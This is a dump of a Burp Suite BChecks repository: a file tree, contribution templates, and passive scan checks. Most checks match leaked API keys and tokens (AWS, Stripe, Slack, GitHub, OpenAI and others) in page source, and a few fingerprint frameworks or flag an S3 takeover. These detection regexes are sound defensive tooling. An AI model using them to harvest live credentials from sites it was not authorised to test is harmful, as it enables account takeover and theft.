├── .gitignore ├── BCheckChecker-1.9.jar ├── .github ├── pull_request_template.md ├── ISSUE_TEMPLATE │ ├── burp_bug_report.md │ ├── feature_request.md │ └── template_bug_report.md └── workflows │ ├── pr_bcheck_checker.yml │ ├── issue_webhook.yml │ └── pr_webhook.yml ├── other ├── tokens │ ├── nuget-api-key.bcheck │ ├── google-api-key.bcheck │ ├── openai-api-key.bcheck │ ├── slack-user-token.bcheck │ ├── crates-api-key.bcheck │ ├── github-app.bcheck │ ├── sauce-token.bcheck │ ├── mailchimp-api-key.bcheck │ ├── slack-bot-token.bcheck │ ├── mailgun-api-token.bcheck │ ├── picatic-api-key.bcheck │ ├── square-access.bcheck │ ├── dynatrace-api-token.bcheck │ ├── telegram-bot-token.bcheck │ ├── age-secret-key.bcheck │ ├── amazon-sns-topic.bcheck │ ├── bitly-secret-key.bcheck │ ├── facebook-access-token.bcheck │ ├── github-refresh.bcheck │ ├── mapbox-token-disclosure.bcheck │ ├── newrelic-admin-api-key.bcheck │ ├── pypi-upload-token.bcheck │ ├── segment-public-token.bcheck │ ├── sendgrid-api-key.bcheck │ ├── stripe-secret-key.bcheck │ ├── aws-api-key.bcheck │ ├── azure-apim-secretkey.bcheck │ ├── fcm-server-key.bcheck │ ├── google-client-id.bcheck │ ├── npm-access-token.bcheck │ ├── razorpay-clientid-disclosure.bcheck │ ├── shopify-app-secret.bcheck │ ├── age-public-key.bcheck │ ├── codeclimate-token.bcheck │ ├── discord-webhook.bcheck │ ├── github-oauth-access.bcheck │ ├── oauth-access-key.bcheck │ ├── rubygems-api-key.bcheck │ ├── shopify-customapp-token.bcheck │ ├── stackhawk-api.bcheck │ ├── github-personal-access.bcheck │ ├── google-oauth-prefixed.bcheck │ ├── gitlab-personal-token.bcheck │ ├── jdbc-connection-string.bcheck │ ├── loqate-api-key.bcheck │ ├── newrelic-rest-api-key.bcheck │ ├── shopify-legacy-token.bcheck │ ├── stripe-restricted-key.bcheck │ ├── twilio-api-key.bcheck │ ├── adobe-oauth-secret.bcheck │ ├── jwt-token.bcheck │ ├── newrelic-insights-key.bcheck │ ├── square-oauth-secret-token.bcheck │ ├── zenserp-api-key.bcheck │ ├── shopify-public-token.bcheck 
│ ├── shoppable-token.bcheck │ ├── heroku-api-key.bcheck │ ├── gitlab-pipeline-token.bcheck │ ├── google-calendar-link.bcheck │ ├── newrelic-synthetics-location-key.bcheck │ ├── cloudinary-credentials.bcheck │ ├── jenkins-crumb-token.bcheck │ ├── zapier-webhook-token.bcheck │ ├── axiom-digitalocean-key-exposure.bcheck │ ├── braintree-access-token.bcheck │ ├── newrelic-pixie-api-key.bcheck │ ├── newrelic-pixie-deploy-key.bcheck │ ├── gitlab-runner-token.bcheck │ ├── zoho-webhook-token.bcheck │ ├── aws-access-key-value.bcheck │ ├── aws-session-token.bcheck │ ├── microsoft-teams-webhook.bcheck │ ├── slack-webhook-token.bcheck │ ├── tugboat-config-exposure.bcheck │ ├── jwt-hmac-alg-detected.bcheck │ ├── aws-access-secret-key.bcheck │ └── cookie-cached-on-disk.bcheck ├── shiro │ ├── shiro_passive.bcheck │ └── shiro_active.bcheck ├── Netscaler_CitrixADC_hash_icon_detection.bcheck ├── takeover-s3-bucket.bcheck ├── technologies │ ├── Firebase-Detect.bcheck │ └── WoodWing-Detect.bcheck ├── recon │ ├── Check_OPTIONS.bcheck │ └── backend-language.bcheck ├── JavaScript │ ├── malicious_polyfill_cdn.bcheck │ ├── malicious_javascript_imported.bcheck │ └── jsMapFile.bcheck ├── prometheus │ ├── exposed-prometheus-metrics.bcheck │ ├── unauth-access-to-prometheus-server.bcheck │ ├── exposed-prometheus-api-endpoints.bcheck │ └── exposed-generic-prometheus-metrics.bcheck ├── apache-mod_info.bcheck ├── PHP Laravel Debug Mode enabled.bcheck ├── takeover-shopify.bcheck ├── files │ ├── configs │ │ ├── gitlab-ci-discovery.bcheck │ │ ├── git-config-discovery.bcheck │ │ ├── WordPress-ReadMe.bcheck │ │ └── web-config.discovery.bcheck │ ├── 000~ROOT~000-exposed.bcheck │ ├── npm-debug-log.bcheck │ ├── ruby-on-rails-storage.bcheck │ ├── Interesting-file-error-in-the-response.bcheck │ ├── ds-store-exposed.bcheck │ └── svn-exposed.bcheck ├── gcp.bcheck ├── Cookie-SameSite-Disabled.bcheck ├── missing-security-txt.bcheck ├── Apache Struts OGNL Console Publicly Accessible.bcheck ├── 
exposed-simple-saml-php-ui.bcheck ├── Blind-SSRF-By-Collaborator.bcheck ├── configs │ ├── apache-airflow-config-exposure.bcheck │ └── dockerrun-aws-config-page-exposure.bcheck ├── php-8.1.0-dev-backdoor.bcheck ├── IBM Websphere Source File Publicly Accessible.bcheck ├── ntlm-authentication-discovery.bcheck ├── fastjson │ ├── Fastjson-1.2.62-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.41-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.24-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.43-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.67-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.47-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.42-Deserialization-RCE.bcheck │ ├── Fastjson-1.2.68-Deserialization-RCE.bcheck │ └── Fastjson-1.2.80-Deserialization-RCE.bcheck ├── go debug pprof exposed.bcheck ├── springboot │ ├── Springboot heapdump actuator.bcheck │ ├── Springboot logfile actuator.bcheck │ ├── Springboot metrics actuator.bcheck │ ├── Springboot caches actuator.bcheck │ ├── Springboot info actuator.bcheck │ ├── Springboot health actuator.bcheck │ ├── Springboot loggers actuator.bcheck │ ├── Springboot conditions actuator.bcheck │ ├── Springboot scheduledtasks actuator.bcheck │ ├── Springboot threaddump actuator.bcheck │ ├── Springboot env actuator.bcheck │ ├── Springboot beans actuator.bcheck │ ├── Springboot trace actuator.bcheck │ ├── Springboot autoconfig actuator.bcheck │ └── Springboot configprops actuator.bcheck ├── SAP Directory Listing.bcheck ├── MsExchange-ECP-Admin-Accessible.bcheck ├── xxl-job │ └── xxl_job_rce.bcheck ├── APIs │ └── couchbase-unauth-apis.bcheck ├── nacos │ ├── Nacos-default-password.bcheck │ └── Nacos-severidentity-bypass.bcheck ├── SAP │ └── SAP authentication bypass check.bcheck ├── symfony-verbose-debug-mode.bcheck ├── Etcd Server - Unauthenticated Access.bcheck ├── WebBackup Exposed.bcheck ├── Kubernetes_Pods_API_Discovery_&_Remote_Code_Execution.bcheck ├── GraphQL │ └── grapple-get-method.bcheck ├── Cache Deception check (Path 
confusion).bcheck ├── corsCredentialedRequestsMisconfiguration.bcheck ├── Cloudflare External Image Resizing Misconfiguration.bcheck ├── Rails CRLF and XSS.bcheck ├── exposed-laravel-clockwork.bcheck ├── OAuth │ └── OpenID-Dynamic-Client-Registration-Endpoint-Detected.bcheck ├── exposed-laravel-telescope.bcheck ├── bypass │ ├── waf-bypass.bcheck │ └── 403-429-bypass.bcheck ├── csrf_magic_backdoor.bcheck ├── sentinel │ └── Alibaba-Sentinel-SSRF.bcheck └── Apache Tomcat Manager Path Normalization Panel.bcheck ├── examples ├── leaked-aws-token.bcheck ├── blind-ssrf.bcheck ├── exposed-git-directory.bcheck ├── README.md ├── suspicious-input-transformation.bcheck └── exposed-backup-file.bcheck ├── vulnerability-classes └── injection │ ├── CRLFInjection.bcheck │ ├── SSRFInjection.bcheck │ ├── Spring4Shell.bcheck │ ├── SSTI-Razor.bcheck │ └── ExtendedSSRFInjection.bcheck └── vulnerabilities-CVEd ├── CVE-2018-11759-Apache mod_jk access control bypass.bcheck ├── CVE-2022-22978-spring_security_auth_bypass.bcheck ├── CVE-2001-0537 CISCO Authentication Bypass.bcheck ├── CVE-2022-22963-spring_cloud_function_rce.bcheck ├── CVE-2021-20323 keycloak xss.bcheck ├── CVE-2025-29927-Next-js-middleware-bypass.bcheck ├── CVE-2020-5902 F5 Networks Authentication Bypass.bcheck ├── CVE-2018-1273-spring_data_commons_rce.bcheck ├── CVE-2023-35078 Ivanti EPMM Unauthenticate Access.bcheck ├── CVE-2020-1957-shiro_auth_bypass.bcheck ├── CVE-2022-22965-spring_data_binding_rce.bcheck ├── CVE-2017-8046-spring_data_rest_rce.bcheck ├── CVE-2023-37265 - CasaOS - Auth Bypass due to a lack of IP address verification.bcheck ├── CVE-2019-17662 - ThinVNC 10b1 - Auth Bypass.bcheck ├── CVE-2023-29298 Adobe ColdFusion Access Control Bypass.bcheck ├── CVE-2020-35713 - Belkin Linksys RE6500 10012001 - RCE.bcheck ├── CVE-2023-39141 Aria2 WebUI - Path Traversal.bcheck ├── CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting.bcheck ├── CVE_2021_21816_D_Link_DIR_3040_1_13B03_Information_Disclosure.bcheck ├── 
CVE_2021_20114_TCExam_Gt_14_8_1_Sensitive_Information_Exposure.bcheck ├── CVE-2023-46805-Ivanti Auth Bypass.bcheck ├── CVE-2018-20824 - Atlassian Jira WallboardServlet Cross Site Scripting.bcheck ├── CVE_2022_0150_WordPress_Accessibility_Helper_Lt_0_6_0_7_Cross_Site.bcheck ├── CVE-2017-4971-spring_webflow_rce.bcheck ├── CVE-2023-38035 - Ivanti Sentry - Auth Bypass.bcheck ├── CVE-2023-5244-Microweber less than V.2.0-Cross-Site-Scripting.bcheck ├── CVE-2023-23752-Joomla-information-disclosure.bcheck ├── CVE-2025-5777 - CitrixBleed 2.bcheck ├── CVE-2023-36845 Juniper Networks - PHP External Variable Modification.bcheck ├── CVE-2023-26360 Adobe ColdFusion Arbitrary File Read and Code Execution.bcheck ├── CVE-2018-1000129 - Jolokia 137 - Cross-Site Scripting.bcheck ├── CVE-2023-24488 - Citrix Gateway Open Redirect and XSS.bcheck ├── CVE-2022-0140.bcheck ├── CVE-2020-10770 Keycloak request_uri SSRF.bcheck └── CVE-2023-5074 D-Link D-View 8 v2.0.1.28 - Authentication Bypass.bcheck /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | .vscode 3 | .idea 4 | -------------------------------------------------------------------------------- /BCheckChecker-1.9.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PortSwigger/BChecks/main/BCheckChecker-1.9.jar -------------------------------------------------------------------------------- /.github/pull_request_template.md: -------------------------------------------------------------------------------- 1 | ### BCheck Contributions 2 | 3 | * [ ] BCheck compiles and executes as expected 4 | * [ ] BCheck contains appropriate metadata (name, version, author, description and appropriate tags) 5 | * [ ] Only .bcheck files have been added or modified 6 | * [ ] BCheck is in the appropriate folder 7 | * [ ] PR contains single or limited number of BChecks (Multiple PRs are preferred) 8 | * [ ] BCheck attempts to 
minimize false positives 9 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/burp_bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a bug report to help us improve BChecks within Burp Suite 4 | title: "[BUG]" 5 | labels: bug 6 | assignees: '' 7 | 8 | --- 9 | 10 | ### Current behavior 11 | 12 | 13 | 14 | ### Expected behavior 15 | 16 | 17 | 18 | ### Environment details 19 | 20 | - Burp version: 21 | - BCheck language version: 22 | - Operating system: 23 | 24 | 25 | ### Additional details 26 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an enhancement for BChecks 4 | title: "[FEATURE]" 5 | labels: enhancement 6 | assignees: '' 7 | 8 | --- 9 | 10 | ### What is the problem you are trying to solve? 11 | 12 | 13 | 14 | ### How are you currently being hindered by this problem? 15 | 16 | 17 | 18 | ### How would you like this problem to be solved? 19 | 20 | 21 | 22 | ### Any additional details? 
23 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/template_bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: BCheck template bug 3 | about: Create a bug report to report an issue with a specific BCheck 4 | title: "[BUG]" 5 | labels: bug, template 6 | assignees: '' 7 | 8 | --- 9 | 10 | ### Path of script within repository 11 | 12 | 13 | 14 | ### Current behavior 15 | 16 | 17 | 18 | ### Expected behavior 19 | 20 | 21 | 22 | ### Environment details 23 | 24 | - Burp version: 25 | - BCheck language version: 26 | - Operating system: 27 | 28 | 29 | ### Additional details 30 | -------------------------------------------------------------------------------- /other/tokens/nuget-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "NuGet API Key" 4 | description: "Looks for NuGet API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "nuget", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "oy2[a-z0-9]{43}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "NuGet API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /examples/leaked-aws-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Response-level (passive)" 4 | description: "Looks in responses to see if there are leaked AWS Access Key IDs" 5 | author: "Carlos Montoya" 6 | tags: "passive" 7 | 8 | given response then 9 | if {latest.response} matches "AKIA[0-9A-Z]{16}" then 10 | report issue: 11 | severity: high 12 | confidence: firm 13 | detail: "Leaked AWS Access Key ID." 
14 | remediation: "Replace your keys and ensure keys are no longer revealed." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/google-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Google API Key" 4 | description: "Looks for Google API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "google" 7 | 8 | given response then 9 | if {latest.response} matches "AIza[0-9A-Za-z\-_]{35}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Google API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/openai-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "OpenAI API Key" 4 | description: "Looks for OpenAI API key exposure." 5 | author: "@puzzlepeaches" 6 | tags: "openai", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "sk-[a-zA-Z0-9]{48}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "OpenAI API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/slack-user-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Slack User token disclosure" 4 | description: "Looks for Slack User token in page source." 
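5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "slack" 7 | 8 | given response then 9 | if {latest.response} matches "xoxp-[0-9A-Za-z\-]{72}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Slack User token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/shiro/shiro_passive.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Shiro Cookie Check Passive" 4 | description: "Detects Apache Shiro by the rememberMe=deleteMe cookie in responses" 5 | author: "timeshatter" 6 | tags: "shiro", "passive" 7 | 8 | given response then 9 | if "rememberMe=deleteMe" in {latest.response} then 10 | report issue: 11 | severity: info 12 | confidence: firm 13 | detail: "Apache Shiro detected: the response contains rememberMe=deleteMe. This is a framework fingerprint, not evidence of a vulnerability on its own; confirm the deployed Shiro version and its rememberMe configuration." 14 | remediation: "Keep Apache Shiro up to date, make sure the rememberMe feature does not rely on a default or hard-coded cipher key, and disable rememberMe if it is not needed." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/crates-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Crates.io API Key" 4 | description: "Looks for API keys for Crates.io in page source." 5 | author: "@puzzlepeaches" 6 | tags: "crates", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\bcio[a-zA-Z0-9]{32}\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Crates.io API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 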
15 | end if -------------------------------------------------------------------------------- /other/tokens/github-app.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Github App Token" 4 | description: "Looks for Github App Tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "github", "app", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b((?:ghu|ghs)_[a-zA-Z0-9]{36})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Github App Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/sauce-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Sauce Token" 4 | description: "Searches for Sauce Tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "sauce", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)sauce.{0,50}\b([a-f0-9-]{36})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Sauce Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source." 
15 | end if 16 | -------------------------------------------------------------------------------- /other/Netscaler_CitrixADC_hash_icon_detection.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Netscaler/CitrixADC Icon Hash" 4 | description: "Detects the hash of Netscaler and Citrix ADC" 5 | tags: "passive" 6 | author: "Randsec" 7 | 8 | given response then 9 | if "/vpn/images/AccessGateway.ico" in {latest.response.body} or "receiver/images/common/icon_vpn.ico" in {latest.response.body} then 10 | report issue: 11 | severity: info 12 | confidence: firm 13 | detail: "Possible Netscaler / Citrix ADC detected" 14 | end if 15 | -------------------------------------------------------------------------------- /other/tokens/mailchimp-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Mailchimp API Value" 4 | description: "Looks for Mailchimp API values in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "mailchimp" 7 | 8 | given response then 9 | if {latest.response} matches "[0-9a-f]{32}-us[0-9]{1,2}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Mailchimp API value found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/slack-bot-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Slack Access Token" 4 | description: "Looks for slack access token in page source." 
5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "slack" 7 | 8 | given response then 9 | if {latest.response} matches "xoxb-[0-9A-Za-z\-]{51}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Slack access token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/mailgun-api-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Mailgun API Key" 4 | description: "Looks for Mailgun API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "mailgun", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)(?:mailgun|mg).{0,20}key-([a-z0-9]{32})\\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Mailgun API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/picatic-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Picatic API Key Disclosure" 4 | description: "Looks for Picatic API key disclosures in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token" 7 | 8 | given response then 9 | if {latest.response} matches "sk_live_[0-9a-z]{32}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Picatic API Key has been disclosed." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 
15 | end if -------------------------------------------------------------------------------- /other/tokens/square-access.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Square Access Token" 4 | description: "Looks for Square access tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "square", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)\b(sq0atp-[a-z0-9_-]{22})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Square Access Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/dynatrace-api-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Dynatrace API Token" 4 | description: "Looks for Dynatrace API tokens." 5 | author: "@puzzlepeaches" 6 | tags: "dynatrace", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(dt0[a-zA-Z]{1}[0-9]{2}\.[A-Z0-9]{24}\.[A-Z0-9]{64})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Dynatrace API Token found." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/telegram-bot-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Telegram Bot Token" 4 | description: "Looks for Telegram Bot Tokens in page source." 
5 | author: "@puzzlepeaches" 6 | tags: "telegram", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(\d+:AA[a-zA-Z0-9_-]{32,33})" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Telegram Bot Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/age-secret-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Age Identity Key in Source Code" 4 | description: "Looks for Age identity keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "age-encryption", "exposure", "tokens" 7 | 8 | given response then 9 | if {latest.response} matches "\bAGE-SECRET-KEY-1[0-9A-Z]{58}\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Age identity key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/amazon-sns-topic.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Amazon SNS Topic Disclosure" 4 | description: "Discloses Amazon SNS Topics." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "amazon" 7 | 8 | given response then 9 | if {latest.response} matches "arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Amazon SNS topic disclosed in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 
15 | end if -------------------------------------------------------------------------------- /other/tokens/bitly-secret-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Bitly Secret Key Disclosure" 4 | description: "Looks for Bitly secret keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "bitly" 7 | 8 | given response then 9 | if {latest.response} matches "R_[0-9a-f]{32}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Bitly Secret Key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/facebook-access-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Facebook Access Token" 4 | description: "Looks for Facebook access tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "facebook", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(EAACEdEose0cBA[a-zA-Z0-9]+)\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Facebook access token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/github-refresh.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "GitHub Refresh Token" 4 | description: "Checks for GitHub refresh tokens in page source." 
5 | author: "@puzzlepeaches" 6 | tags: "github", "refresh", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(ghr_[a-zA-Z0-9]{76})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "GitHub refresh token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/mapbox-token-disclosure.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Mapbox Token Disclosure" 4 | description: "Looks for Mapbox tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "token", "exposure", "mapbox", "disclosure" 7 | 8 | given response then 9 | if {latest.response} matches "sk\.eyJ1Ijoi\w+\.[\w-]*" then 10 | report issue: 11 | severity: low 12 | confidence: tentative 13 | detail: "Mapbox token found in page source." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/newrelic-admin-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "NewRelic Admin API Key Disclosure" 4 | description: "Looks for NewRelic Admin API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)NRAA-[a-f0-9]{27}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "NewRelic Admin API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 
15 | end if -------------------------------------------------------------------------------- /other/tokens/pypi-upload-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "PyPI Upload Token" 4 | description: "Searches for PyPI upload tokens in website content." 5 | author: "@puzzlepeaches" 6 | tags: "pypi", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "pypi-AgEIcHlwaS5vcmc[a-zA-Z0-9_-]{50,}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "PyPI Upload Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/segment-public-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Segment Public API Token" 4 | description: "Looks for Segment's API tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "segment", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "sgp_[a-zA-Z0-9]{64}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Segment Public API Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/sendgrid-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Sendgrid API Key Disclosure" 4 | description: "Looks for exposed Sendgrid API keys." 
5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "sendgrid" 7 | 8 | given response then 9 | if {latest.response} matches "SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Sendgrid API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/stripe-secret-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Stripe Secret Key Disclosure" 4 | description: "Detects exposure of Stripe Secret Keys." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "stripe" 7 | 8 | given response then 9 | if {latest.response} matches "sk_(?:live|test)_[0-9a-zA-Z]{24}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Stripe Secret Key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/takeover-s3-bucket.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "AWS S3 Bucket takeover" 4 | description: "Possible sub-domain takeover via AWS S3 bucket." 5 | tags: "passive,s3,takeover,cloud" 6 | author: "Milad Fadavvi" 7 | 8 | 9 | given response then 10 | if "NoSuchBucket" in {latest.response} and "BucketName:" in {latest.response} then 11 | report issue: 12 | severity: high 13 | confidence: firm 14 | detail: "https://github.com/EdOverflow/can-i-take-over-xyz/issues/36" 15 | remediation: "Delete the related DNS record." 
